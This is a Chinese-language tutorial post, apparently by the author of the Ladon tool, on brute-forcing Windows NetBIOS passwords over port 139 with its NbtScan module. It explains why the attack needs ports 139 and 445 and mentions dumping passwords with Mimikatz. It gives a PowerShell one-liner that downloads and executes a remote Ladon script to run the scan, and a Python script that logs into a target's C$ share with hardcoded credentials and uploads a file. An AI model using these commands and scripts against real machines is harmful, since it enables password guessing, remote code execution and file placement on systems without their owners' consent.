logo

K8哥哥

没有绝对安全的系统

〖教程〗NbtScan 139端口弱口令/Netbios密码爆破

本文于 1254 天之前发表

=============================================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

版本

Ladon >= 7.1

139端口

NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows”文件和打印机共享”和SAMBA。

IPC$通信

Windows系统中的net use ipc$整个通信过程,先445->137->139验证,当你开启防火墙禁用445,发现系统命令就无法连接IPC了,根本没机会走到139,所以使用系统自带命令连接的ipc$需要同时开启这些端口。说入侵139就是IPC$的说法是错误的,就像说wmiexec.vbs可完全替代PSEXEC工具一样,这个脚本需要目标开启135和445,因为它通过445来传输结果,意味着目标只开放135这个VBS的回显就没有了,其实假设目标只开放445,这个VBS脚本还能执行命令吗?哪来的替代或扔掉?这个系统的IPC$连接也是同理,测试首先得把其它端口禁了再说话。虽然系统自带命令需要同时开启,但是 自己实现SMB服务器的话是可以只使用139或只用445端口的,详情参考impacket。

Nbt爆破

系统自带命令需要同时开启139和445,但是 自己实现SMB服务器的话是可以只使用139或只用445端口的。系统的IPC$就像读取系统密码一样,可以先植入CS再用MIMI插件读取,但是我们也可以不使用CS,直接MIMI读取密码啊。基于和MIMI可以独立读取密码的原理,反向思路我们也可以完全不走445,直接通过139验证WINDOWS密码,所以这个和IPC$不一样(指的是系统命令连接的ipc),所以为了防止大家误解,起名为NbtScan。毕竟走的也是Netbios,系统IPC$验证一是时间非常久,且必须开启445,如果445都开了为何不用SmbScan验证密码呢?但是由于近几年勒索病毒横行,可能很多机器默认会关闭445,所以会导致无法通过445验证密码,但是没关系还有139啊。

Ladon

139端口 Netbios密码爆破(Windows)

Ladon 192.168.1.8/24 NbtScan
image

PowerLadon

远程加载NbtScan 139端口弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon7.1_all.ps1'); Ladon 192.168.1.141 NbtScan”

139传输文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

#!/usr/bin/env python
#coding:utf-8

from smb.SMBConnection import SMBConnection
from nmb.NetBIOS import NetBIOS
import os,sys
def getBIOSName(remote_smb_ip, timeout=30):
try:
bios = NetBIOS()
srv_name = bios.queryIPForName(remote_smb_ip, timeout=timeout)
except:
print >> sys.stderr, "Looking up timeout, check remote_smb_ip again!!"
finally:
bios.close()
return srv_name
serverip='192.168.1.40'
conn = SMBConnection('k8gege', 'k8gege520', 'C$',getBIOSName(serverip)[0], use_ntlm_v2 = True)
assert conn.connect(serverip, 139)
#temdir='/'
#dir=os.path.join('/','public')
f = open('C:/123.txt', 'rb')
conn.storeFile('Users','234.txt',f)
f.close()

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

扫码加入K8小密圈